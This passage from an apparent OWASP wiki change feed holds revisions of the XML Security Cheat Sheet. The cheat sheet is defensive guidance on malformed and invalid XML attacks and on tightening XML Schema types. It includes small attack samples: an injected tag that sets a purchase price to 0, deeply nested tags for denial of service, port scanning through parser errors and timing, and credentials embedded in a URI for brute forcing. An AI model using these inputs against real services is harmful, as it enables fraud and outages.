&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to an open port will be very quick by comparison (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish in higher-latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224425</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224425"/>
				<updated>2016-12-21T20:12:08Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken to process a regular XML document with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well formed is to open a new, empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. The application then appends the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the restrictions that XML Schema can express. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1,000,000 digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;, as is the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since a DTD cannot express specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
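&lt;br /&gt;
As a rough sketch of how another schema language could close this gap, the same &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt; structure might be expressed in XML Schema with explicit limits. The limits used here (a &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; of at most 256 characters and an &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; between 0 and 150) are illustrative assumptions, not values taken from any specification:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;!-- assumed limit, for illustration only --&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;!-- assumed range, for illustration only --&amp;gt;&lt;br /&gt;
              &amp;lt;xs:minInclusive value=&amp;quot;0&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxInclusive value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Under these assumed limits, the one-million-digit &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; value would fail validation because it exceeds the maximum of 150.&lt;br /&gt;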
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are only partially enforced for the element, which means that the information is probably tested using an application instead of the proposed sample schema.&lt;br /&gt;
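&lt;br /&gt;
For the hexadecimal case mentioned at the start of this section, a minimal sketch could rely on the built-in &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt; type instead of a restricted string. The element name &amp;lt;tt&amp;gt;token&amp;lt;/tt&amp;gt; and the size of 16 octets are hypothetical; for this data type the &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; facet counts octets, so 16 octets correspond to 32 hexadecimal digits:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;token&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:hexBinary&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- hypothetical size: 16 octets, written as 32 hexadecimal digits --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;16&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;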
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might produce a negative result on the user’s account. To avoid that logical vulnerability, use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user-controlled values as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. With any other restriction that still admits zero, a zero denominator may trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With this schema, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; set to Infinity or NaN will not trigger any errors in the application, because these values fail validation. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
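&lt;br /&gt;
The traffic light case mentioned above could be sketched the same way. The element name &amp;lt;tt&amp;gt;light&amp;lt;/tt&amp;gt; and the three color names are assumptions chosen for illustration:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;light&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- hypothetical set of accepted values --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;red&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;yellow&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;green&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;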
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
